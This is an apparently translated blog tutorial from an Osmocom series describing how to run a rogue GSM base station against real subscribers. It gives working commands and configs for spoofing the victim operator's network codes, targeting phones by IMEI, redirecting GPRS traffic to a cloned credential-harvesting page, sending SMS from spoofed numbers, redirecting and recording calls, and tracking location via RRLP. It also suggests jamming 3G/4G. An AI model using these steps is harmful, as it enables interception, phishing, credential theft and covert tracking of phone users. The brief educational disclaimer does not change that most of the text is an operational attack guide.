Practical examples of attacks inside the GSM network

In this article about the Osmocom cycle, we will look at the practical implementation of attacks on subscribers of GSM networks. The attacks will be considered as using voice calls and SMS as well as attacks while the subscriber is working with GPRS.

To work we need everything that I described earlier. Therefore, for those who have joined us just now, I recommend reading the materials of previous articles.

Cycle articles:
')
We start GSM network at home
Analysis of GSM network traffic in Wireshark
Add GPRS to your home GSM network
Practical examples of attacks inside the GSM network

Attention!
This article is provided solely for educational purposes and the author does not bear any responsibility for the actions of other users, their interference with commercial GSM networks and the damage of their own equipment. Before you start anything, make sure you understand what you are doing.

Training

To work we need another component, which we mentioned only briefly earlier - osmo-sip-connector .

We will connect our base station based on two osmocombb-compatible phones to the IP PBX Asterisk using this component.



This will allow us to record conversations of subscribers working in our network, as well as redirect their outgoing calls to answering machines and the like.

I failed to install the osmo-sip-connector on Ubuntu 14.04 due to dependencies and I decided to go the other way and just installed all the components on Debian 9 (32-bits) through the Nightly Builds deb packages . During the installation of the packages I did not get any errors and problems with dependencies. The only thing I got was some texinfo errors when building the old toolchain. But this was easily corrected by editing gcc / doc / gcc.texi. I want to warn you that the osmocombb jolly / testing branch build should be done using the old toolchain. Even if you correct a compilation error when using the new toolchain, you will get an unstable transceiver / TRX firmware in the future.

Install osmo-sip-connector and asterisk

apt-get install osmo-sip-connector apt-get install libsofia-sip-ua-glib-dev apt-get install asterisk 

Create an osmo-sip-connector.cfg file in your directory with other configuration files.

 app mncc socket-path /tmp/bsc_mncc sip local 127.0.0.1 5069 remote 127.0.0.1 5060 

Configuring asterisk

Asterisk's very basic configuration might look like this.

Add to the end of the /etc/asterisk/sip.conf file

 [GSM] type=friend host=127.0.0.1 dtmfmode=rfc2833 canreinvite=no allow=all context=gsmsubscriber port=5069 

Add to the end of the /etc/asterisk/extensions.conf file

 [gsmsubscriber] exten=>_XXXXX,1,Dial(SIP/GSM/${EXTEN}) exten=>_XXXXX,n,Playback(vm-nobodyavail) exten=>_XXXXX,n,HangUp() 

Restart asterisk.

Capture subscriber in our GSM network

2G / 3G / 4G

Immediately consider two options:

1. The target subscriber uses the old phone without 3G / 4G support.
2. The target subscriber uses a modern smartphone that supports 4G.

In the second case, the smartphone will first look for 4G networks, then 3G networks and only then 2G networks. Thus, if you are in a place where there is a good signal from the 3G / 4G base station of the home operator of the subscriber, then it will not connect to your 2G base station.

To solve this problem, you must either create interference on the 3G / 4G frequencies of the operator, or be with the subscriber in a location where there is no 3G or 4G coverage. Contrary to the doubts of many people, so many places so far.

In the first case, when the target phone does not support 3G / 4G, everything becomes simpler and our base station should simply be within reach of the target phone and have a fairly powerful signal.

MCC / MNC

In order for the phone to automatically connect to our GSM network, it must be a home for the SIM card installed in the target phone.

A home network is defined by three parameters:

• MNC (Mobile Network Code)
• MCC (Mobile Country Code)
• Networ Name

All these values ​​are not secret and you can easily find them out even from Wikipedia.
These parameters are transmitted to the base station in SI (System Information) messages on the BCCH logical channel (Timelot 0).

Now we have the following in the OpenBSC settings:

 network country code 1 mobile network code 1 short name MyNet long name MyNet 

You can find out the MCC and MNC subscriber based on the phone number. There are many sites with this information, for example this one . Finding the name in the Latin network is also not difficult. Please note that the name is case sensitive.

At home, you will also need to change the auth-policy to closed, so that only your phones have the right to connect to the network with the real MCC and MNC.

To do this, add subscribers to the HLR with IMSI of their personal SIM-cards, if they are not already in the HLR.

 telnet localhost 4242 en conf t subscriber create imsi _IMSI_1 subscriber imsi _IMSI_1 authorized 1 subscriber create imsi _IMSI_2 subscriber imsi _IMSI_2 authorized 1 ... write file end 

And change the authentication policy

 telnet localhost 4242 en conf t network auth policy closed write file end 

Restart OsmoNITB.

Now subscribers not represented in the HLR will not be able to connect to your network.

IMEI

IMEI - International Mobile Equipment Identity.

When subscribers start connecting to your network, how do you know who exactly you need? You do not see phone numbers, you only see IMSI and IMEI. Knowing IMEI, you can uniquely identify the model of the phone in which the SIM card is inserted. For example using the site http://www.imei.info/ . The model and the origin of the phone are described by the first 8 digits of IMEI . Phones that support simultaneous work with multiple SIM-cards are assigned several IMEI numbers.

Thus, if you know that the target subscriber uses Apple iPhone 5, you can download the database with TAC codes and find out TAC for iPhone 5. This database is available from osmocom - http://tacdb.osmocom.org/



In order not to capture subscribers with unsuitable TACs in their network, it would be good to refuse subscribers during registration if their equipment has a TAC not for iPhone 5.

At the moment I have not found the settings for EIR in OsmoNITB, but soon we will have separate MSC, HLR, and possibly EIR, and there it will be.

At the moment we will manually monitor the connected subscribers. You can just put "authorized 0" for everyone, if its IMEI does not suit us.

 OpenBSC# subscriber imsi 123456789012345 authorized 0 

Now, all that remains is to get close to the subscriber and launch CalypsoBTS.

MITM during GPRS-surfing

When a subscriber enters our network, it becomes unavailable for external calls and cannot call anywhere (usually, see the exception below).

However, we can provide it with access to the Internet using GPRS / EDGE packet data services. Since the machine that provides access to the Internet for the subscriber is completely under our control, we can do whatever you want with TCP / IP traffic.

The easiest way is for us to work with this site.



I remind you that the speed of data transmission in GPRS is very low, at the same time, modern phones, when they access the network, immediately begin the process of checking updates, mail, and news. All your applications are starting to update their data. This can make it difficult for the subscriber to open something in the browser, since, in addition to low bandwidth, packet loss can occur if you use unproductive equipment like CalypsoBTS.

Therefore, when planning an MITM attack, you need to keep this in mind. It is possible, for example, to block access to everything, except for the resource, through iptables, the interaction of the victim with which we are interested.

Further, using the MITMf framework, you can directly attack.

We will redirect all HTTP subscriber requests to our web server.

 iptables -t nat -A PREROUTING -i tun0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.1.32:80 

Where 192.168.1.32 is the IP address of the Kali Linux machine that I will use to attack.

Additionally, you can prohibit all other requests on port 443 and others, in order to increase the download speed of the phishing site.

Use the SE Toolkit to copy the site and conduct a phishing attack.

Run SET



We want to get credentials from a specific site. Configure SET.







We create phishing authentication page defcon.ru



When trying to go to any website via the attacker's GPRS network service, the victim gets to the phishing page (note the URL).



In this case, my network has MCC 001 and MNC 01, so we see the roaming icon. In this case, in order to gain access to the Internet, the victim will have to allow packet data in roaming, which is inconvenient. Therefore, for this attack, you need to use the MCC / MNC and the network name of the operator of the target subscriber (see below). In the laboratory, you can not do this.

After entering the credentials SET displays the username and password

SMS phishing

When phishing mailings are made pretending to be banks or relatives, they are sent from an unknown number to the subscriber, which is suspicious. When a subscriber enters a hostile GSM network, he can send SMS from any number.

To send SMS you just need to do the following:

Connect to OsmoNITB VTY and create a subscriber on whose behalf an SMS will be sent.

 telnet localhost 4242 OpenBSC# en OpenBSC# subscriber create imsi 123456789012345 OpenBSC# subscriber imsi 123456789012345 extension 89001234567 

Where
123456789012345 - IMSI is controlled by the phone included in the attacker's network.
89001234567 - The phone number from which the victim will receive SMS.



And you can send SMS from the same VTY interface OsmoNITB

 OpenBSC# subscriber imsi 987654321987654 sms sender extension 890012345678 send Your bank... 

Where 987654321987654 - IMSI phone victim, captured in the network.



If the victim responds to the SMS, you will receive a response to the phone under control. You can also easily get the answer by viewing the Wireshark traffic dump, while not having a controlled telephone on the network.

Please note that there is no roaming icon in the screenshot at this time, as the MCC, MNC and the home network name of the SIM card of the target subscriber are used, and the SMS came from the subscriber listed in the phone book, i.e. detect such an attack is impossible.

Sending Binary-SMS is another vector. OsmoNITB allows you to send Siltent SMS, but I did not find how to send a binary using OsmoNITB. At the moment, you can try to use something like that . However, this vector still needs to be studied and the implementation of specific attacks in each case will be different.

Using OsmoNITB, you can send binary SMS via SMPP interface.
Thanks axilirator for the info!

Redirect and record voice calls

If the victim tries to call the number from which the SMS came (89001234567), then her call will be redirected to the phone controlled by the attacker.

To use Asterisk to route calls, you need to add the -M switch to the osmo-nitb command.

 -M /tmp/bsc_mncc 

And run osmo-sip-connector

 osmo-sip-connector -c ___ 

Now our calls will be routed through Asterisk, we can set any dialplan and fully define how the call will go. The attacker can, for example, direct all calls to an answering machine, where a robotic female voice will ask the caller for confidential information. Nobody will think that a robot can harm a person?

Call recording can be performed using standard Asterisk constructs and in the /etc/extensions.conf file you can use Monitor () and MixMonitor ().

Radio Resource LCS (Location Service) Protocol

RRLP - GSM protocol that allows the network to request the current coordinates of the subscriber.
RRLP does not require user authentication and consent to provide this data.
We, through OsmoNITB, can also send an RRLP request to the captured subscriber.
If you are using CalypsoBTS, then you are next to the subscriber and this is unlikely to be useful, however, using more powerful transceivers RRLP allows you to monitor the subscriber.

Unfortunately, I didn’t have enough time to try it, but I suppose I need to use the osmocom-lcs module . When the RRLP request mode is activated in OsmoNITB VTY, RRLP requests will be sent to the subscriber each time a channel is allocated to him.

You can activate RRLP

 telnet localhost 4242 en conf t network rrlp mode  write file end 

Requests and responses can be seen in Wireshark. In this case, my phone returned Not Supported to the RRLP request.



Thanks axilirator for the info.

There are other attacks to which 2G networks are susceptible and most cell phones still support GSM. To avoid becoming a victim of such attacks, be careful when receiving suspicious calls, CMC or when surfing from a mobile phone, as well as pay attention to the 3G / LTE icons, which usually indicate what generation of the network you are currently working on.